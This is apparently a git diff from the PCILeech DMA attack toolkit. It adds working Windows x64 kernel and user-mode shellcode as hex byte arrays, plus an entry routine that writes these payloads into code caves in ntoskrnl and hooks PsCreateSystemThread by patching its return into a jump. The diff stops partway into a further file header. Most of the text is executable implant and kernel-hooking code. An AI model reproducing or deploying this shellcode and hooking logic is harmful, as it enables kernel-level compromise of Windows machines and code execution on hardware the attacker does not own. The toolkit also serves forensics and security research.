+		0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+		0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x8b, 0xea, 0x48, 0x85, 0xc9,
+		0x74, 0x7a, 0xb8, 0x4d, 0x5a, 0x00, 0x00, 0x66, 0x39, 0x01, 0x75, 0x70,
+		0x48, 0x63, 0x41, 0x3c, 0x48, 0x03, 0xc1, 0x74, 0x67, 0x81, 0x38, 0x50,
+		0x45, 0x00, 0x00, 0x75, 0x5f, 0x8b, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48,
+		0x03, 0xd1, 0x74, 0x54, 0x44, 0x8b, 0x5a, 0x18, 0x45, 0x85, 0xdb, 0x74,
+		0x4b, 0x8b, 0x42, 0x20, 0x85, 0xc0, 0x74, 0x44, 0x8b, 0x72, 0x24, 0x4c,
+		0x8d, 0x0c, 0x01, 0x8b, 0x7a, 0x1c, 0x48, 0x03, 0xf1, 0x48, 0x03, 0xf9,
+		0x45, 0x33, 0xc0, 0x45, 0x85, 0xdb, 0x74, 0x2c, 0x45, 0x8b, 0x11, 0x4c,
+		0x03, 0xd1, 0x33, 0xdb, 0xeb, 0x0b, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc2,
+		0xc1, 0xcb, 0x0d, 0x03, 0xd8, 0x41, 0x8a, 0x02, 0x84, 0xc0, 0x75, 0xee,
+		0x3b, 0xdd, 0x74, 0x23, 0x41, 0xff, 0xc0, 0x49, 0x83, 0xc1, 0x04, 0x45,
+		0x3b, 0xc3, 0x72, 0xd4, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08, 0x48,
+		0x8b, 0x6c, 0x24, 0x10, 0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b, 0x7c,
+		0x24, 0x20, 0xc3, 0x46, 0x0f, 0xb7, 0x04, 0x46, 0x44, 0x3b, 0x42, 0x14,
+		0x73, 0xde, 0x42, 0x8b, 0x04, 0x87, 0x48, 0x03, 0xc1, 0xeb, 0xd7
+	};
+	*ppb = WINX64_PSCMD_KERNEL_BIN;
+	*pcb = sizeof(WINX64_PSCMD_KERNEL_BIN);
+}
+
+// standard wx64_exec_user payload, compile and extract shellcode with:
+// 
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC wx64_exec_user_c.c
+// ml64 wx64_exec_user.asm /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_exec_user_c.obj
+// shellcode64.exe -o wx64_exec_user.exe
+// xxd -i wx64_exec_user.bin
+VOID GetData_PSCMD_USER(PBYTE *ppb, PDWORD pcb)
+{
+	BYTE WINX64_PSCMD_USER_BIN[] = {
+		0xb0, 0x00, 0xb2, 0x01, 0x48, 0x8d, 0x0d, 0x49, 0x00, 0x00, 0x00, 0xf0,
+		0x0f, 0xb0, 0x11, 0x75, 0x42, 0x48, 0x8d, 0x0d, 0xe8, 0xff, 0xff, 0xff,
+		0x48, 0x81, 0xe1, 0x00, 0xf0, 0xff, 0xff, 0x65, 0x48, 0x8b, 0x14, 0x25,
+		0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18,
+		0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x12, 0x48, 0x8b, 0x12, 0x48, 0x8b,
+		0x52, 0x20, 0x56, 0x48, 0x8b, 0xf4, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83,
+		0xec, 0x20, 0xe8, 0xe1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3,
+		0x00, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74,
+		0x24, 0x10, 0x48, 0x89, 0x7c, 0x24, 0x18, 0x48, 0x63, 0x41, 0x3c, 0x4c,
+		0x8b, 0xc9, 0x8b, 0xf2, 0x44, 0x8b, 0x84, 0x08, 0x88, 0x00, 0x00, 0x00,
+		0x4c, 0x03, 0xc1, 0x45, 0x8b, 0x50, 0x20, 0x45, 0x8b, 0x58, 0x24, 0x4c,
+		0x03, 0xd1, 0x41, 0x8b, 0x58, 0x1c, 0x4c, 0x03, 0xd9, 0x41, 0x8b, 0x78,
+		0x18, 0x48, 0x03, 0xd9, 0x33, 0xc9, 0x85, 0xff, 0x74, 0x2d, 0x41, 0x8b,
+		0x12, 0x49, 0x03, 0xd1, 0x45, 0x33, 0xc0, 0xeb, 0x0d, 0x0f, 0xb6, 0xc0,
+		0x48, 0xff, 0xc2, 0x41, 0xc1, 0xc8, 0x0d, 0x44, 0x03, 0xc0, 0x8a, 0x02,
+		0x84, 0xc0, 0x75, 0xed, 0x44, 0x3b, 0xc6, 0x74, 0x1c, 0xff, 0xc1, 0x49,
+		0x83, 0xc2, 0x04, 0x3b, 0xcf, 0x72, 0xd3, 0x33, 0xc0, 0x48, 0x8b, 0x5c,
+		0x24, 0x08, 0x48, 0x8b, 0x74, 0x24, 0x10, 0x48, 0x8b, 0x7c, 0x24, 0x18,
+		0xc3, 0x41, 0x0f, 0xb7, 0x0c, 0x4b, 0x8b, 0x04, 0x8b, 0x49, 0x03, 0xc1,
+		0xeb, 0xe3, 0xcc, 0xcc, 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
+		0x41, 0x78, 0x48, 0x8b, 0xd9, 0x33, 0xc9, 0x48, 0x89, 0x08, 0x39, 0x8b,
+		0x88, 0x00, 0x00, 0x00, 0x74, 0x22, 0x89, 0x8b, 0x88, 0x00, 0x00, 0x00,
+		0x48, 0x8b, 0x4b, 0x58, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b, 0x50, 0xff,
+		0x53, 0x08, 0x48, 0x8b, 0x4b, 0x60, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b,
+		0x68, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x43, 0x70, 0x48, 0xb9, 0xac, 0xda,
+		0x37, 0x13, 0x00, 0x22, 0xda, 0xfe, 0x48, 0x89, 0x08, 0x48, 0x8b, 0x43,
+		0x78, 0x48, 0x89, 0x08, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3, 0xcc, 0xcc,
+		0x40, 0x53, 0x48, 0x83, 0xec, 0x70, 0xba, 0x68, 0x00, 0x00, 0x00, 0x48,
+		0x8b, 0xd9, 0x8d, 0x4a, 0xd8, 0xff, 0x53, 0x30, 0xc7, 0x00, 0x68, 0x00,
+		0x00, 0x00, 0xc7, 0x40, 0x3c, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x13,
+		0x48, 0x83, 0xba, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74, 0x18, 0x48, 0x8b,
+		0x4b, 0x60, 0x48, 0x89, 0x48, 0x58, 0x48, 0x8b, 0x4b, 0x68, 0x48, 0x89,
+		0x48, 0x50, 0x48, 0x8b, 0x4b, 0x60, 0x48, 0x89, 0x48, 0x60, 0x48, 0x8b,
+		0x13, 0x48, 0x8d, 0x4c, 0x24, 0x50, 0x48, 0x89, 0x4c, 0x24, 0x48, 0x45,
+		0x33, 0xc9, 0x48, 0x89, 0x44, 0x24, 0x40, 0x45, 0x33, 0xc0, 0x48, 0x83,
+		0x64, 0x24, 0x38, 0x00, 0x33, 0xc9, 0x48, 0x83, 0x64, 0x24, 0x30, 0x00,
+		0x8b, 0x82, 0x10, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x28, 0xc7, 0x44,
+		0x24, 0x20, 0x01, 0x00, 0x00, 0x00, 0xff, 0x53, 0x18, 0x85, 0xc0, 0x74,
+		0x26, 0x48, 0x8b, 0x4c, 0x24, 0x50, 0x48, 0x89, 0x8b, 0x80, 0x00, 0x00,
+		0x00, 0x48, 0x8b, 0x0b, 0x48, 0x83, 0xb9, 0x08, 0x01, 0x00, 0x00, 0x00,
+		0x74, 0x08, 0x48, 0x8b, 0x4c, 0x24, 0x58, 0xff, 0x53, 0x08, 0xb8, 0x01,
+		0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
+		0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+		0x89, 0x70, 0x18, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0x8b, 0xe9, 0xc7,
+		0x40, 0xc8, 0xfb, 0x97, 0xfd, 0x0f, 0xc7, 0x40, 0xcc, 0x80, 0x8f, 0x0c,
+		0x17, 0x48, 0x8d, 0x7a, 0x48, 0xc7, 0x40, 0xd0, 0x72, 0xfe, 0xb3, 0x16,
+		0x48, 0x8d, 0x70, 0xec, 0xc7, 0x40, 0xd4, 0x6b, 0xd0, 0x2b, 0xca, 0xbb,
+		0x09, 0x00, 0x00, 0x00, 0xc7, 0x40, 0xd8, 0x74, 0xab, 0x30, 0xac, 0xc7,
+		0x40, 0xdc, 0xfa, 0x97, 0x02, 0x4c, 0xc7, 0x40, 0xe0, 0x16, 0x65, 0xfa,
+		0x10, 0xc7, 0x40, 0xe4, 0xb0, 0x49, 0x2d, 0xdb, 0xc7, 0x40, 0xe8, 0x1f,
+		0x79, 0x0a, 0xe8, 0x48, 0x8d, 0x76, 0xfc, 0x48, 0x8b, 0xcd, 0x8b, 0x16,
+		0x48, 0x8d, 0x7f, 0xf8, 0xe8, 0xeb, 0xfd, 0xff, 0xff, 0x48, 0x89, 0x07,
+		0x83, 0xc3, 0xff, 0x75, 0xe6, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b,
+		0x6c, 0x24, 0x68, 0x48, 0x8b, 0x74, 0x24, 0x70, 0x48, 0x83, 0xc4, 0x50,
+		0x5f, 0xc3, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28, 0x48, 0x8b, 0xc1, 0x48,
+		0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0x89, 0x80, 0x00, 0x00, 0x00, 0xff,
+		0x50, 0x28, 0x33, 0xc9, 0x85, 0xc0, 0x74, 0x0f, 0x81, 0x7c, 0x24, 0x30,
+		0x03, 0x01, 0x00, 0x00, 0x75, 0x05, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x8b,
+		0xc1, 0x48, 0x83, 0xc4, 0x28, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
+		0x10, 0x56, 0x48, 0x83, 0xec, 0x30, 0x83, 0xb9, 0x88, 0x00, 0x00, 0x00,
+		0x00, 0x48, 0x8b, 0xd9, 0x0f, 0x84, 0xab, 0x00, 0x00, 0x00, 0xbe, 0x00,
+		0x08, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8, 0xa5, 0xff, 0xff, 0xff, 0x85,
+		0xc0, 0x0f, 0x84, 0x96, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x43, 0x70, 0x4c,
+		0x8b, 0x4b, 0x78, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x48, 0x10,
+		0x41, 0x8b, 0x51, 0x08, 0x81, 0xe1, 0xff, 0x07, 0x00, 0x00, 0x81, 0xe2,
+		0xff, 0x07, 0x00, 0x00, 0x3b, 0xca, 0x8b, 0xc2, 0x48, 0x8b, 0x4b, 0x58,
+		0x77, 0x08, 0x44, 0x8b, 0xc6, 0x44, 0x2b, 0xc2, 0xeb, 0x03, 0x45, 0x33,
+		0xc0, 0x49, 0x8d, 0x51, 0x68, 0x48, 0x03, 0xd0, 0x4c, 0x8d, 0x4c, 0x24,
+		0x40, 0xff, 0x53, 0x38, 0x85, 0xc0, 0x74, 0x4d, 0x48, 0x8b, 0x4b, 0x78,
+		0x8b, 0x44, 0x24, 0x40, 0x48, 0x01, 0x41, 0x08, 0xeb, 0x1d, 0x83, 0xbb,
+		0x88, 0x00, 0x00, 0x00, 0x00, 0x74, 0x36, 0x48, 0x8b, 0xcb, 0xe8, 0x35,
+		0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x1d, 0xb9, 0x0a, 0x00, 0x00, 0x00,
+		0xff, 0x53, 0x40, 0x48, 0x8b, 0x4b, 0x78, 0x48, 0x8b, 0x43, 0x70, 0x48,
+		0x8b, 0x49, 0x08, 0x48, 0x2b, 0x48, 0x10, 0x48, 0x3b, 0xce, 0x73, 0xce,
+		0x83, 0xbb, 0x88, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x5a, 0xff, 0xff,
+		0xff, 0x48, 0x8b, 0xcb, 0xe8, 0x5b, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x5c,
+		0x24, 0x48, 0x48, 0x83, 0xc4, 0x30, 0x5e, 0xc3, 0x40, 0x53, 0x48, 0x83,
+		0xec, 0x30, 0x83, 0xb9, 0x88, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9,
+		0x74, 0x78, 0x48, 0x8b, 0xcb, 0xe8, 0xda, 0xfe, 0xff, 0xff, 0x85, 0xc0,
+		0x74, 0x6c, 0x48, 0x8b, 0x53, 0x78, 0x48, 0x8b, 0x4b, 0x70, 0x48, 0x8b,
+		0x42, 0x10, 0x48, 0x39, 0x41, 0x08, 0x75, 0x0a, 0xb9, 0x0a, 0x00, 0x00,
+		0x00, 0xff, 0x53, 0x40, 0xeb, 0x47, 0x44, 0x8b, 0x41, 0x08, 0x48, 0x8d,
+		0x51, 0x68, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8d, 0x4c, 0x24,
+		0x40, 0x48, 0x8b, 0x4b, 0x50, 0x25, 0xff, 0x07, 0x00, 0x00, 0x41, 0x81,
+		0xe0, 0xff, 0x07, 0x00, 0x00, 0x48, 0x03, 0xd0, 0x41, 0x3b, 0xc0, 0x72,
+		0x06, 0x41, 0xb8, 0x00, 0x08, 0x00, 0x00, 0x44, 0x2b, 0xc0, 0xff, 0x53,
+		0x48, 0x85, 0xc0, 0x74, 0x15, 0x48, 0x8b, 0x4b, 0x78, 0x8b, 0x44, 0x24,
+		0x40, 0x48, 0x01, 0x41, 0x10, 0x83, 0xbb, 0x88, 0x00, 0x00, 0x00, 0x00,
+		0x75, 0x88, 0x48, 0x8b, 0xcb, 0xe8, 0xbe, 0xfc, 0xff, 0xff, 0x48, 0x83,
+		0xc4, 0x30, 0x5b, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74,
+		0x24, 0x10, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0x8b, 0xfa, 0x48, 0x8b,
+		0xd9, 0x48, 0x8b, 0xcf, 0xba, 0xfa, 0x97, 0x02, 0x4c, 0xe8, 0x06, 0xfc,
+		0xff, 0xff, 0xba, 0x90, 0x00, 0x00, 0x00, 0x8d, 0x4a, 0xb0, 0xff, 0xd0,
+		0x48, 0x8d, 0x8b, 0xe8, 0x0e, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x89,
+		0x08, 0x48, 0x8d, 0x50, 0x08, 0x48, 0x8b, 0xcf, 0xe8, 0x83, 0xfd, 0xff,
+		0xff, 0x48, 0x8b, 0x0e, 0x48, 0x83, 0xb9, 0x08, 0x01, 0x00, 0x00, 0x00,
+		0x74, 0x7b, 0x48, 0x83, 0x64, 0x24, 0x38, 0x00, 0x4c, 0x8d, 0x44, 0x24,
+		0x30, 0xc7, 0x44, 0x24, 0x30, 0x18, 0x00, 0x00, 0x00, 0x48, 0xba, 0x21,
+		0x95, 0xef, 0xdf, 0x32, 0x12, 0x65, 0x12, 0xbf, 0x01, 0x00, 0x00, 0x00,
+		0xbb, 0x00, 0x08, 0x00, 0x00, 0x89, 0x7c, 0x24, 0x40, 0x44, 0x8b, 0xcb,
+		0x48, 0x8b, 0x06, 0x48, 0x8b, 0x88, 0x08, 0x01, 0x00, 0x00, 0x48, 0x89,
+		0x4e, 0x70, 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x05, 0x00,
+		0x10, 0x00, 0x00, 0x48, 0x89, 0x46, 0x78, 0x48, 0x89, 0x11, 0x48, 0x8d,
+		0x4e, 0x68, 0x48, 0x8b, 0x46, 0x78, 0x48, 0x89, 0x10, 0x48, 0x8d, 0x56,
+		0x50, 0xff, 0x56, 0x10, 0x48, 0x8d, 0x56, 0x60, 0x44, 0x8b, 0xcb, 0x48,
+		0x8d, 0x4e, 0x58, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0xff, 0x56, 0x10, 0x89,
+		0xbe, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xce, 0xe8, 0x3f, 0xfc, 0xff,
+		0xff, 0x85, 0xc0, 0x75, 0x0a, 0x48, 0x8b, 0xce, 0xe8, 0xd7, 0xfb, 0xff,
+		0xff, 0xeb, 0x45, 0x48, 0x8b, 0x06, 0x48, 0x83, 0xb8, 0x08, 0x01, 0x00,
+		0x00, 0x00, 0x74, 0x38, 0x48, 0x83, 0x64, 0x24, 0x28, 0x00, 0x4c, 0x8d,
+		0x05, 0x6b, 0xfe, 0xff, 0xff, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8b,
+		0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20, 0x48, 0x83, 0x64, 0x24,
+		0x28, 0x00, 0x4c, 0x8d, 0x05, 0x77, 0xfd, 0xff, 0xff, 0x83, 0x64, 0x24,
+		0x20, 0x00, 0x4c, 0x8b, 0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20,
+		0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0x74, 0x24, 0x68, 0x48, 0x83,
+		0xc4, 0x50, 0x5f, 0xc3
+	};
+	*ppb = WINX64_PSCMD_USER_BIN;
+	*pcb = sizeof(WINX64_PSCMD_USER_BIN);
+}
+
+// ----------------------------------------------------------------------------
+// CORE LOGIC/MASTER FUNCTIONALITY BELOW:
+// ----------------------------------------------------------------------------
+
+#define H_PsCreateSystemThread          0x94a06b02
+VOID c_EntryPoint(PKMDDATA pk)
+{
+	PBYTE pbData;
+	DWORD cbData;
+	QWORD hModuleNTOSKRNL, hPsCreateSystemThread, hHookFn, hHook;
+	QWORD hKMD, hVFS, hPSCMD_KERNEL, hPSCMD_USER;
+	DWORD dwOffsetRET = 0, dwOffsetJMP;
+	// locate ntoskrnl.exe
+	hModuleNTOSKRNL = FindNtoskrnl();
+	if(!hModuleNTOSKRNL) {
+		pk->dataOut[0] = 0xf0000001;
+		return;
+	}
+	pk->dataOut[1] = hModuleNTOSKRNL;
+	// locate hook function - PsCreateSystemThreadEx
+	hPsCreateSystemThread = PEGetProcAddressH(hModuleNTOSKRNL, H_PsCreateSystemThread);
+	if(!hPsCreateSystemThread) {
+		pk->dataOut[0] = 0xf0000002;
+		return;
+	}
+	hHookFn = hPsCreateSystemThread;
+	pk->dataOut[2] = hHookFn;
+	// hook : locate, but do not patch yet.
+	while(TRUE) {
+		if((*(PBYTE)(hHookFn + dwOffsetRET) == 0xC3 /* RET */) && (*(PDWORD)(hHookFn + dwOffsetRET + 1) == 0xCCCCCCCC /* PAD */)) {
+			break;
+		}
+		if(dwOffsetRET == 0x100) {
+			pk->dataOut[0] = 0xf0000003;
+			return;
+		}
+		dwOffsetRET++;
+	}
+	hHook = hHookFn + dwOffsetRET;
+	// code cave : locate and patch in VFS (virtual file system) module.
+	GetData_VFS(&pbData, &cbData);
+	hVFS = FindCodeCave(hModuleNTOSKRNL, cbData);
+	if(!hVFS) {
+		pk->dataOut[0] = 0xf0000004;
+		return;
+	}
+	pk->dataOut[3] = hVFS;
+	CopyMem((PVOID)hVFS, (PVOID)pbData, cbData);
+	// code cave : locate and patch in KMD (windows pcileech kernel module).
+	GetData_KMD(&pbData, &cbData);
+	hKMD = FindCodeCave(hModuleNTOSKRNL, cbData);
+	if(!hKMD) {
+		pk->dataOut[0] = 0xf0000005;
+		return;
+	}
+	pk->dataOut[4] = hKMD;
+	CopyMem((PVOID)hKMD, (PVOID)pbData, cbData);
+	// code cave : locate and patch in pscmd kernelmode code.
+	GetData_PSCMD_KERNEL(&pbData, &cbData);
+	hPSCMD_KERNEL = FindCodeCave(hModuleNTOSKRNL, cbData);
+	if(!hPSCMD_KERNEL) {
+		pk->dataOut[0] = 0xf0000006;
+		return;
+	}
+	pk->dataOut[5] = hPSCMD_KERNEL;
+	CopyMem((PVOID)hPSCMD_KERNEL, (PVOID)pbData, cbData);
+	// code cave : locate and patch in pscmd usermode code.
+	GetData_PSCMD_USER(&pbData, &cbData);
+	hPSCMD_USER = FindCodeCave(hModuleNTOSKRNL, cbData);
+	if(!hPSCMD_USER) {
+		pk->dataOut[0] = 0xf0000006;
+		return;
+	}
+	pk->dataOut[6] = hPSCMD_USER;
+	CopyMem((PVOID)hPSCMD_USER, (PVOID)pbData, cbData);
+	// patch in offsets in KMD code
+	*(PWORD)(hKMD + 0x02) = pk->dataIn[0] ? (WORD)pk->dataIn[0] : 0x0045;
+	*(PDWORD)(hKMD + 0x04) = (DWORD)hModuleNTOSKRNL;
+	*(PDWORD)(hKMD + 0x08) = (DWORD)hKMD;
+	*(PDWORD)(hKMD + 0x0C) = (DWORD)hVFS;
+	*(PDWORD)(hKMD + 0x10) = (DWORD)hPSCMD_KERNEL;
+	*(PDWORD)(hKMD + 0x14) = (DWORD)hPSCMD_USER;
+	// hook function by patching RET instruction
+	dwOffsetJMP = (DWORD)hKMD - ((DWORD)hHook + 5);
+	*(PBYTE)(hHook) = 0xE9;					// JMP
+	*(PDWORD)(hHook + 1) = dwOffsetJMP;		// JMP ADDR
+}
diff --git a/pcileech_shellcode/wx64_common.c b/pcileech_shellcode/wx64_common.c
index 39eacc2..5ab0e57 100644
--- a/pcileech_shellcode/wx64_common.c
+++ b/pcileech_shellcode/wx64_common.c
@@ -1,7 +1,7 @@
 // wx64_common.c : support functions used by Windows x64 KMDs started by stage3 EXEC.
 // Compatible with Windows x64.
 //
-// (c) Ulf Frisk, 2016
+// (c) Ulf Frisk, 2016, 2017
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 
@@ -70,36 +70,35 @@ QWORD KernelGetModuleBase(_In_ PKERNEL_FUNCTIONS fnk, _In_ LPSTR szModuleName)
 
 VOID InitializeKernelFunctions(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUNCTIONS fnk)
 {
-	QWORD FUNC2[][2] = {
-		{ &fnk->_stricmp,					H__stricmp },
-		{ &fnk->ExAllocatePool,				H_ExAllocatePool },
-		{ &fnk->ExFreePool,					H_ExFreePool },
-		{ &fnk->IoCreateDriver,				H_IoCreateDriver },
-		{ &fnk->KeDelayExecutionThread,		H_KeDelayExecutionThread },
-		{ &fnk->KeGetCurrentIrql,			H_KeGetCurrentIrql },
-		{ &fnk->MmGetPhysicalAddress,		H_MmGetPhysicalAddress },
-		{ &fnk->MmLoadSystemImage,			H_MmLoadSystemImage },
-		{ &fnk->MmMapIoSpace,				H_MmMapIoSpace },
-		{ &fnk->MmUnloadSystemImage,		H_MmUnloadSystemImage },
-		{ &fnk->MmUnmapIoSpace,				H_MmUnmapIoSpace },
-		{ &fnk->RtlAnsiStringToUnicodeString, H_RtlAnsiStringToUnicodeString },
-		{ &fnk->RtlCopyMemory,				H_RtlCopyMemory },
-		{ &fnk->RtlFreeUnicodeString,		H_RtlFreeUnicodeString },
-		{ &fnk->RtlInitAnsiString,			H_RtlInitAnsiString },
-		{ &fnk->RtlInitUnicodeString,		H_RtlInitUnicodeString },
-		{ &fnk->RtlInitUnicodeString,		H_RtlInitUnicodeString },
-		{ &fnk->RtlZeroMemory,				H_RtlZeroMemory },
-		{ &fnk->ZwClose,					H_ZwClose },
-		{ &fnk->ZwCreateFile,				H_ZwCreateFile },
-		{ &fnk->ZwOpenFile,					H_ZwOpenFile },
-		{ &fnk->ZwReadFile,					H_ZwReadFile },
-		{ &fnk->ZwQueryDirectoryFile,		H_ZwQueryDirectoryFile },
-		{ &fnk->ZwQuerySystemInformation,	H_ZwQuerySystemInformation },
-		{ &fnk->ZwSetSystemInformation,		H_ZwSetSystemInformation },
-		{ &fnk->ZwWriteFile,				H_ZwWriteFile }
-	};
-	for(QWORD j = 0; j < (sizeof(FUNC2) / sizeof(QWORD[2])); j++) {
-		*(PQWORD)FUNC2[j][0] = PEGetProcAddressH(qwNtosBase, (DWORD)FUNC2[j][1]);
+	DWORD i = 0, NAMES[25];
+	NAMES[i++] = H__stricmp;
+	NAMES[i++] = H_ExAllocatePool;
+	NAMES[i++] = H_ExFreePool;
+	NAMES[i++] = H_IoCreateDriver;
+	NAMES[i++] = H_KeDelayExecutionThread;
+	NAMES[i++] = H_KeGetCurrentIrql;
+	NAMES[i++] = H_MmGetPhysicalAddress;
+	NAMES[i++] = H_MmLoadSystemImage;
+	NAMES[i++] = H_MmMapIoSpace;
+	NAMES[i++] = H_MmUnloadSystemImage;
+	NAMES[i++] = H_MmUnmapIoSpace;
+	NAMES[i++] = H_RtlAnsiStringToUnicodeString;
+	NAMES[i++] = H_RtlCopyMemory;
+	NAMES[i++] = H_RtlFreeUnicodeString;
+	NAMES[i++] = H_RtlInitAnsiString;
+	NAMES[i++] = H_RtlInitUnicodeString;
+	NAMES[i++] = H_RtlZeroMemory;
+	NAMES[i++] = H_ZwClose;
+	NAMES[i++] = H_ZwCreateFile;
+	NAMES[i++] = H_ZwOpenFile;
+	NAMES[i++] = H_ZwQueryDirectoryFile;
+	NAMES[i++] = H_ZwQuerySystemInformation;
+	NAMES[i++] = H_ZwSetSystemInformation;
+	NAMES[i++] = H_ZwReadFile;
+	NAMES[i++] = H_ZwWriteFile;
+	while(i) {
+		i--;
+		*((PQWORD)fnk + i) = (QWORD)PEGetProcAddressH(qwNtosBase, NAMES[i]);
 	}
 }
 
diff --git a/pcileech_shellcode/wx64_common.h b/pcileech_shellcode/wx64_common.h
index 462c713..5ba34b8 100644
--- a/pcileech_shellcode/wx64_common.h
+++ b/pcileech_shellcode/wx64_common.h
@@ -29,30 +29,30 @@ typedef struct _ETHREAD *PETHREAD;
 * KMD DATA struct. This struct must be contained in a 4096 byte section (page).
 * This page/struct is used to communicate between the inserted kernel code and
 * the pcileech program.
-* VNR: 002
+* VNR: 003
 */
 typedef struct tdKMDDATA {
 	QWORD MAGIC;					// [0x000] magic number 0x0ff11337711333377.
-	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
 	QWORD AddrKallsymsLookupName;	// [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
 	QWORD DMASizeBuffer;			// [0x018] size of DMA buffer.
 	QWORD DMAAddrPhysical;			// [0x020] physical address of DMA buffer.
 	QWORD DMAAddrVirtual;			// [0x028] virtual address of DMA buffer.
 	QWORD _status;					// [0x030] status of operation
 	QWORD _result;					// [0x038] result of operation TRUE|FALSE
-	QWORD _address;					// [0x040] virtual address to operate on.
+	QWORD _address;					// [0x040] address to operate on.
 	QWORD _size;					// [0x048] size of operation / data in DMA buffer.
 	QWORD OperatingSystem;			// [0x050] operating system type
-	QWORD ReservedKMD;				// [0x058] reserved for specific kmd data (dependant on KMD version).
-	QWORD ReservedFutureUse1[20];	// [0x060] reserved for future use.
+	QWORD ReservedKMD[8];			// [0x058] reserved for specific kmd data (dependant on KMD version).
+	QWORD ReservedFutureUse1[13];	// [0x098] reserved for future use.
 	QWORD dataInExtraLength;		// [0x100] length of extra in-data.
 	QWORD dataInExtraOffset;		// [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
 	QWORD dataInExtraLengthMax;		// [0x110] maximum length of extra in-data. 
 	QWORD dataInConsoleBuffer;		// [0x118] physical address of 1-page console buffer.
 	QWORD dataIn[28];				// [0x120]
-	QWORD dataOutExtraLength;		// [0x200] length of extra in-data.
+	QWORD dataOutExtraLength;		// [0x200] length of extra out-data.
 	QWORD dataOutExtraOffset;		// [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
-	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra in-data. 
+	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra out-data. 
 	QWORD dataOutConsoleBuffer;		// [0x218] physical address of 1-page console buffer.
 	QWORD dataOut[28];				// [0x220]
 	PVOID fn[32];					// [0x300] used by shellcode to store function pointers.
@@ -281,6 +281,11 @@ typedef struct tdKERNEL_FUNCTIONS {
 		_Inout_ PVOID SystemInformation,
 		_In_ ULONG SystemInformationLength,
 		_Out_opt_ PULONG ReturnLength);
+	NTSTATUS(*ZwSetSystemInformation)(
+		_In_ QWORD SystemInformationClass,
+		_In_ PVOID SystemInformation,
+		_In_ ULONG SystemInformationLength
+		);
 	NTSTATUS(*ZwReadFile)(
 		_In_     HANDLE           FileHandle,
 		_In_opt_ HANDLE           Event,
@@ -292,11 +297,6 @@ typedef struct tdKERNEL_FUNCTIONS {
 		_In_opt_ PQWORD           ByteOffset,
 		_In_opt_ PULONG           Key
 		);
-	NTSTATUS(*ZwSetSystemInformation)(
-		_In_ QWORD SystemInformationClass,
-		_In_ PVOID SystemInformation,
-		_In_ ULONG SystemInformationLength
-		);
 	NTSTATUS(*ZwWriteFile)(
 		_In_ HANDLE FileHandle, 
 		_In_opt_ HANDLE Event,
diff --git a/pcileech_shellcode/wx64_exec_user_c.c b/pcileech_shellcode/wx64_exec_user_c.c
index 3f61997..d5a45dd 100644
--- a/pcileech_shellcode/wx64_exec_user_c.c
